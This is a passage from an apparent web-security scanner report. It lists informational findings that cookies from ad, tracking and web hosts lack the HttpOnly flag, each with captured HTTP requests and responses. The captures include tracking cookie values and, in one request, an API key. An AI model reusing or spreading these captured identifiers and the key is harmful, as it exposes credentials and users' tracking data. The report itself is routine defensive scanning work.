ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; lifb=ty?i)n!9.l%y_Qs7i<Qa@V'D?

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:24:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; path=/; expires=Thu, 31-Jan-2013 15:24:16 GMT
Set-Cookie: lifb=%y_Qs7i<Qa5p0/:; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT
Cache-Control: no-store
Last-Modified: Tue, 01 Feb 2011 15:24:16 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

12.222. http://adclick.g.doubleclick.net/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adclick.g.doubleclick.net
Path:	/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

test_cookie=CheckForPermission; expires=Tue, 01-Feb-2011 15:45:05 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aclk HTTP/1.1
Host: adclick.g.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.223. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vsd="0@1@4d497418@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
srh=1%3Aq64FAA%3D%3D; Domain=.adbrite.com; Expires=Thu, 03-Feb-2011 15:11:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.224. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_us_1000000=pUMdIz+j8AcU1C3EwLf6K/JvE2KDo6PfhEUKOic5AFeGN29ElLoI5qcC24O5l693kcybp3YbhLd9/YAOhsul0PE+Dh8nRW7l3xo6Ukv+5EjPSKUdov7vgbyf7cVBVEieI8ERFfZhPhDvpfDIia7KIDnhgVMY7SgWFj6HqsbuM56WGcHsyKE38Hx9Sm98uMWQF9dnsix8gbeSI+UmM20XdmCO1T5iSOGF+xsRE/G92UyZC3yhH8TYizNhEvJkLnAxFid1SqN4xUheUWSK0jPiHSnQ+WbAqNtXP+8cRy1ybSn7Ngk1ueHGim7fNM6foEWqdcCxYS+34Icb+5t0D6Nyg7jf1Sv65zticAkrDmR/cuZFLvFg/BrZC47V6nJNqthhCibZMZWALhXDLhoArpfc6lic7zclFnPskmP/vVJajPkwArw/AXp5inP9j3JWhQI7BsAZ8ykMpbkTLls51/KjwPgTLJlNU/l0jRUNLDIviUTVX0oS9v1OQCiQudLP4sPygpGGPPzJBbzOwBtxUU4YrtFGmwSd4FBfh2mRafVaS9EDgANbe39tHHc3bb98ApWWYQWvxsFpMB5vA6broSows6pOAeuPIXNf5hxAXvPAeJu04VBkn9vjcnpeedu7RUgve8SAFVDZmdgwl5kXG4fO/gf0UpYMar6ZFnRXsUFBWdrSUEh8jCRm4eiegPNbrxrxQqo1l6YrEmxIUGSakuHVzKI6km/o66HsmxCGWo5MYXmdfFkvmrtxCzagDy/fIMMnCvFNp7y1kCisCY2g7FeSMC0GC/ZMWN0R0D0Y+waHlaByglfZv87/DK/SHue/9L0cUBdagNty+3JbLheuS/BXWwk4iJE7MX7vExeH0D97ZxK52F1W2DIRvjzHvDxHVq1BQuHQT+SmPSMqOqsiqN3UfvYr4LoDiIUvQOfxMoDOQ/CFTL1hfAJWYacuqfQjMRwODomdQ2DXeRt83dbSQnBjLtw1hkQDknrycEqNfLg31kDpYvJOwf+SAbMKIdWIJX2S2PV/GcnNjshNHLPZZX0yK2J5vnAynAq4yp7TRMWexhN/Mmvqag1RLzJrNSOGN1bakiS6FSQJpuQLIBGspx+punnrkWal9XSIBusUXP8AEcf1yGM7s2izhk6/6kNVG8BK6BW7VO7G5Wo/CY/q3cTknpX43LcTnWBHfU9Gad1rt++O0gzfTZT88bg4ogjHcKaEN1qOoym6de+Iuj0TrAoU9nX5Pz6kyG/ayesPbEXigte/9jVaNwNL3STj/QzqaTcbXD7mNFD8We0/zA5zoCTvN1kreOzhHEadQemkTTPn7bZ0JVlrjPlvsmLFMj+4CMoSrQ0t0Y2S8A==; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:43:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.225. https://adwords.google.com/select/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/select/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AdsUserLocale=en_US; Expires=Thu, 03-Mar-2011 15:30:12 GMT; Path=/; Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /select/Login?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en_US; Expires=Thu, 03-Mar-2011 15:30:12 GMT; Path=/; Secure
Set-Cookie: adwordsReferralSource=sourceid=awo&subid=us-en-et-symh&clickid=; Expires=Mon, 02-May-2011 15:30:12 GMT; Path=/; Secure; HttpOnly
Set-Cookie: I=X9/z4S0BAAA=.9QCH/JbBItRG1yn60m2UCA==.aW3liyqaXI8PWnbsReNkzQ==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=jLu_L6jCfgYugQ7tTxI1Cw:awfe-efe=jLu_L6jCfgYugQ7tTxI1Cw; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=ft9IGCk5EVkRQO_98i-boQ; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en
Date: Tue, 01 Feb 2011 15:30:12 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin?sourceid=awo&subid=us-en
...[SNIP]...

12.226. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

12.227. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Thu, 31-Jan-2013 14:28:14 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.228. http://blog.facebook.com/blog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.facebook.com
Path:	/blog.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=i0PHb; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fblog.facebook.com%2Fblog.php%3Fpost%3D382978412130; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fblog.facebook.com%2Fblog.php%3Fpost%3D382978412130; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog.php?post=382978412130 HTTP/1.1
Host: blog.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.229. http://blog.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.orbitz.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/blog/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

12.230. http://blogsearch.google.com/blogsearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogsearch.google.com
Path:	/blogsearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=263368eebf0d7848:TM=1296574229:LM=1296574229:S=vumEZ771Y5jhBMr7; expires=Thu, 31-Jan-2013 15:30:29 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogsearch HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.231. http://books.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=4abc8d19f12bc81a:TM=1296574232:LM=1296574232:S=ngidMyE0rUGptvZ6; expires=Thu, 31-Jan-2013 15:30:32 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.232. http://books.google.com/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/books

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=0c90630420770629:TM=1296574231:LM=1296574231:S=mhwvdWjwMbFHKvE5; expires=Thu, 31-Jan-2013 15:30:31 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.233. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ActivityInfo=000p81bBo%5f; expires=Tue, 03-May-2011 10:43:37 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 10:43:37 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.234. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/firststeps.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=85eb2c05b28e495690c312b9224a01fa; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=309A03F95CDC491FB935911E37ED14DA; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /browseresources/articles/firststeps.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.235. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/browseresources/articles/managingemployees.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=49639c13297e45b088d53cc2947d18eb; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BFF6A2643B34482D9EFC461635B43FB3; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.236. http://businessonmain.msn.com/questions/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/questions/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=c5c42e124cd54cec96e54f5910b325c1; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8088F9A7C2D749B8B22FA419A3CEDF24; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /questions/default.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.237. http://businessonmain.msn.com/videos/coolrunnings.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://businessonmain.msn.com
Path:	/videos/coolrunnings.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=c9503258c9294a319d8b55c4818f5954; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=CED44E4F52CF4A00855E3594E951B8B7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:30:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/coolrunnings.aspx HTTP/1.1
Host: businessonmain.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.238. http://c.chango.com/collector/tag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.chango.com
Path:	/collector/tag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=1686ac5e-2ee8-11e0-b7c7-00259009a9c2; Domain=chango.com; expires=Sat, 30 Jan 2021 16:18:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collector/tag.js HTTP/1.1
Host: c.chango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.239. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0-6453865.1296661235.0; expires=Mon, 01-Feb-2016 15:40:35 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.240. http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn-sitelife.ehow.com
Path:	/ver1.0/Direct/DirectProxy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SiteLifeHost=SJL01WSITEHW12proddmlocal; domain=ehow.com; path=/
BIGipServerEhowSitelife-80=624690954.20480.0000; path=/ ; domain=ehow.com; path=/
anonId=7b713eee-c445-40fd-b53a-2face7f80646; domain=ehow.com; expires=Thu, 02-Feb-2012 16:18:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/DirectProxy HTTP/1.1
Host: cdn-sitelife.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.241. http://cms.ad.yieldmanager.net/v1/cms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.ad.yieldmanager.net
Path:	/v1/cms

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=s=8lk0vnt6kg9d2&t=1296573858;path=/; expires=

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/cms?esig=1~6451b4a684f76cdc256978b3b9011cd5f8ab2361&nwid=10000358902&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/cacheable/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=80eipqp6i4psl&b=4&s=nj&t=25

Response

HTTP/1.1 302 Found
Date: Tue, 01 Feb 2011 15:24:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=8lk0vnt6kg9d2&t=1296573858;path=/; expires=
Location: http://admonkey.dapper.net/RMXCookieMonster?xid=BLdOXcUmXhXH.SCUot6GMxox
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 790

HTTP/1.1 302 Found
Date: Tue, 01 Feb 2011 15:24:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...

12.242. http://code.google.com/apis/maps/terms.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/apis/maps/terms.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=12173e7013f292ae:TM=1296574272:LM=1296574272:S=z4KWxo5IiJLGfo2s; expires=Thu, 31-Jan-2013 15:31:12 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apis/maps/terms.html HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.243. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=67f4248f6f4e927e:TM=1296663519:LM=1296663519:S=3qkYaXXnuUHAF5bU; expires=Fri, 01-Feb-2013 16:18:39 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.244. http://code.google.com/p/swfobject/wiki/documentation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/wiki/documentation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=febcf9fa8da9b901:TM=1296663519:LM=1296663519:S=5-AUrgWhoWp7Jc89; expires=Fri, 01-Feb-2013 16:18:39 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/wiki/documentation HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.245. http://consumershealthyliving.com/clinical-study.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://consumershealthyliving.com
Path:	/clinical-study.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

af0de5e19d0aeec9236a3a01ce912df8=7bv015kl0m1jt0vltq8jl1b426; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clinical-study.html HTTP/1.1
